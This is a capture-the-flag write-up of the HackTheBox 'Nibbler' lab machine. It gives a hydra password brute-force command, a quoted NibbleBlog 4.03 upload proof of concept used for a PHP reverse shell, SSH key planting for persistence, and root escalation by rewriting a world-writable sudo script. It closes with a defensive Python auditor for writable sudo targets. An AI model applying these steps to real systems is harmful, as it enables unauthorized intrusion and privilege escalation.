HackTheBox - Nibbler

Morten Hansen • January 30, 2022

NIBBLER

IP 10.10.10.75
NMAP
Shows ports 22 and 80 open. The webpage itself shows nothing, but a comment in its source code hints at a nibbleblog folder.

Looking through the files there we find admin@nibbles.com and the user admin. With gobuster we find /admin.php and try to log in. Trying SQL injection gets us banned from the site for some minutes.

Also tried hydra with the following command:

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password. Forgot password" -V
```

```
[80][http-post-form] host: 10.10.10.75   login: admin   password: iloveyou
[80][http-post-form] host: 10.10.10.75   login: admin   password: password
[80][http-post-form] host: 10.10.10.75   login: admin   password: 123456
[80][http-post-form] host: 10.10.10.75   login: admin   password: 12345
[80][http-post-form] host: 10.10.10.75   login: admin   password: 1234567
[80][http-post-form] host: 10.10.10.75   login: admin   password: abc123
[80][http-post-form] host: 10.10.10.75   login: admin   password: rockyou
[80][http-post-form] host: 10.10.10.75   login: admin   password: 12345678
[80][http-post-form] host: 10.10.10.75   login: admin   password: princess
[80][http-post-form] host: 10.10.10.75   login: admin   password: daniel
[80][http-post-form] host: 10.10.10.75   login: admin   password: 123456789
[80][http-post-form] host: 10.10.10.75   login: admin   password: monkey
[80][http-post-form] host: 10.10.10.75   login: admin   password: lovely
[80][http-post-form] host: 10.10.10.75   login: admin   password: babygirl
[80][http-post-form] host: 10.10.10.75   login: admin   password: jessica
[80][http-post-form] host: 10.10.10.75   login: admin   password: nicole
1 of 1 target successfully completed, 16 valid passwords found
```

This did not work and I ended up guessing the password, which was `nibbles`. When logged in we find the version number: `Nibbleblog 4.03`.

A search shows an exploit for this version:
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html

When logged in we follow the exploit. The proof of concept, quoted from the advisory:

```
### **Proof of Concept**

1.  Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
2.  Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
3.  Upload PHP shell, ignore warnings
4.  Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.
```

Setting up a listener and uploading a PHP reverse shell, we get a reverse connection as nibbler.

Once inside we create a `.ssh` folder, give it the correct permissions with `chmod 700 .ssh` and create an `authorized_keys` file containing our own public SSH key. We then SSH in as nibbler@10.10.10.75.

Inside nibbler's home folder there is a ZIP file called personal.zip. Unzipping it creates the file /home/nibbler/personal/stuff/monitor.sh. Running `sudo -l` shows that nibbler can run the script as root:

```
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

When trying to run the script as root we get an error message and it won't launch. The script executes fine when not run through sudo.

After some inspection we see that the file permissions are `-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh`, which means we can edit the file.

We then delete the content and create the following script:

```bash
#!/bin/bash

/bin/bash -p
```

Running the script with sudo gives us a new shell as root, and we can read the flag at /root/root.txt.
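The root step works because sudo runs a file the unprivileged user can rewrite. As an added defender-side check (not part of the original writeup), the script below parses `sudo -l` style output for NOPASSWD entries and reports every target that a non-root user could modify or replace; the `sudo -l` text and the mode-0777 temporary file in `demo()` are constructed to mirror monitor.sh.

```python
import os
import re
import stat
import tempfile

# One NOPASSWD entry as printed by `sudo -l`, e.g. "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
NOPASSWD_RE = re.compile(r"\((?P<runas>[^)]+)\)\s+NOPASSWD:\s*(?P<cmds>.+)")

def parse_nopasswd_commands(sudo_l_output):
    """Return (runas, program_path) pairs from `sudo -l` output; arguments and the ALL keyword are dropped."""
    entries = []
    for m in map(NOPASSWD_RE.search, sudo_l_output.splitlines()):
        if m:
            paths = [c.split()[0] for c in m.group("cmds").split(",") if c.strip() not in ("", "ALL")]
            entries += [(m.group("runas").strip(), p) for p in paths]
    return entries

def modification_risks(path):
    """List the ways a non-root user could change what sudo ends up executing."""
    if not os.path.exists(path):
        return ["target missing: whoever can create it controls what runs as root"]
    st, risks = os.stat(path), []
    if st.st_uid != 0:
        risks.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        risks.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        risks.append("world-writable")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_uid != 0 or parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        risks.append("parent directory modifiable by non-root (file can be swapped)")
    return risks

def audit_sudo_l(sudo_l_output):
    """Map each NOPASSWD target to its risks; an empty dict means nothing flagged."""
    return {path: risks for _, path in parse_nopasswd_commands(sudo_l_output)
            if (risks := modification_risks(path))}

def demo():
    """Constructed scenario mirroring the box: a mode-0777 script listed under NOPASSWD."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "monitor.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho ok\n")
    os.chmod(script, 0o777)  # same -rwxrwxrwx permissions as monitor.sh on the box
    sample = ("User nibbler may run the following commands on Nibbles:\n"
              f"    (root) NOPASSWD: {script}\n")
    return audit_sudo_l(sample)
```

The fix on a real host is the same thing the finding points at: make the target root-owned, mode 755 or tighter, in a root-owned directory, or drop the NOPASSWD entry.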